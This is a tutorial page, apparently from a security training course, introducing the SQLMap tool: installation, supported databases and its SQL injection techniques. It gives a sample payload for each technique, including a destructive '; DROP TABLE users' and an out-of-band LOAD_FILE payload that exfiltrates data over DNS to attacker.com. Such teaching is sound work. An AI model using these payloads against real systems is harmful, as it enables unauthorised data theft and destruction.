SQLMap Essentials

SQLMap is a free and open-source penetration testing tool written in Python that automates the process of detecting and exploiting SQL injection (SQLi) flaws. SQLMap has been continuously developed since 2006 and is still maintained today.

python sqlmap.py -u 'http://inlanefreight.htb/page.php?id=5'

SQLMap comes with a powerful detection engine, numerous features, and a broad range of options and switches for fine-tuning the many aspects of it, such as:

Target connection

Injection detection

Fingerprinting

Enumeration

Optimization

Protection detection and bypass using "tamper" scripts

Database content retrieval

File system access

Execution of the operating system (OS) commands

SQLMap Installation

sudo apt install sqlmap
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
python sqlmap.py

Supported Databases

SQLMap has the largest support for DBMSes of any other SQL exploitation tool. SQLMap fully supports the following DBMSes:

MySQL

Oracle

PostgreSQL

Microsoft SQL Server

SQLite

IBM DB2

Microsoft Access

Firebird

Sybase

SAP MaxDB

Informix

MariaDB

HSQLDB

CockroachDB

TiDB

MemSQL

H2

MonetDB

Apache Derby

Amazon Redshift

Vertica, Mckoi

Presto

Altibase

MimerSQL

CrateDB

Greenplum

Drizzle

Apache Ignite

Cubrid

InterSystems Cache

IRIS

eXtremeDB

FrontBase

SQLMap is the only penetration testing tool that can properly detect and exploit all known SQLi types. We see the types of SQL injections supported by SQLMap with the sqlmap -hh command:

sqlmap -hh

The technique characters BEUSTQ refers to the following:

  • B: Boolean-based blind

  • E: Error-based

  • U: Union query-based

  • S: Stacked queries

  • T: Time-based blind

  • Q: Inline queries

Boolean-based blind SQL Injection

SQLMap exploits Boolean-based blind SQL Injection vulnerabilities through the differentiation of TRUE from FALSE query results, effectively retrieving 1 byte of information per request.

This ranges from fuzzy comparisons of raw response content, HTTP codes, page titles, filtered text, and other factors.

  • TRUE results are generally based on responses having none or marginal difference to the regular server response.

  • FALSE results are based on responses having substantial differences from the regular server response.

  • Boolean-based blind SQL Injection is considered as the most common SQLi type in web applications.

Error-based SQL Injection

Example of Error-based SQL Injection:

AND GTID_SUBSET(@@version,0)

If the database management system (DBMS) errors are being returned as part of the server response for any database-related problems, then there is a probability that they can be used to carry the results for requested queries. In such cases, specialized payloads for the current DBMS are used, targeting the functions that cause known misbehaviors. SQLMap has the most comprehensive list of such related payloads and covers Error-based SQL Injection for the following DBMSes:

MySQL
PostgreSQL
Oracle

Microsoft SQL Server

Sybase

Vertica

IBM DB2

Firebird

MonetDB

UNION query-based

Example of UNION query-based SQL Injection:

UNION ALL SELECT 1,@@version,3

Stacked queries

Example of Stacked Queries:

; DROP TABLE users

Stacking SQL queries, also known as the "piggy-backing," is the form of injecting additional SQL statements after the vulnerable one

Time-based blind SQL Injection

Example of Time-based blind SQL Injection:

AND 1=IF(2>1,SLEEP(5),0)

The principle of Time-based blind SQL Injection is similar to the Boolean-based blind SQL Injection, but here the response time is used as the source for the differentiation between TRUE or FALSE.

  • TRUE response is generally characterized by the noticeable difference in the response time compared to the regular server response

  • FALSE response should result in a response time indistinguishable from regular response times

Inline queries

Example of Inline Queries:

SELECT (SELECT @@version) from

This type of injection embedded a query within the original query. Such SQL injection is uncommon, as it needs the vulnerable web app to be written in a certain way. Still, SQLMap supports this kind of SQLi as well.

Out-of-band SQL Injection

Example of Out-of-band SQL Injection:

LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt'))

This is considered one of the most advanced types of SQLi, used in cases where all other types are either unsupported by the vulnerable web application or are too slow (e.g., time-based blind SQLi). SQLMap supports out-of-band SQLi through "DNS exfiltration," where requested queries are retrieved through DNS traffic.

By running the SQLMap on the DNS server for the domain under control (e.g. .attacker.com), SQLMap can perform the attack by forcing the server to request non-existent subdomains (e.g. foo.attacker.com), where foo would be the SQL response we want to receive. SQLMap can then collect these erroring DNS requests and collect the foo part, to form the entire SQL response.

PreviousMitigating SQL InjectionNextBuilding Attacks

Last updated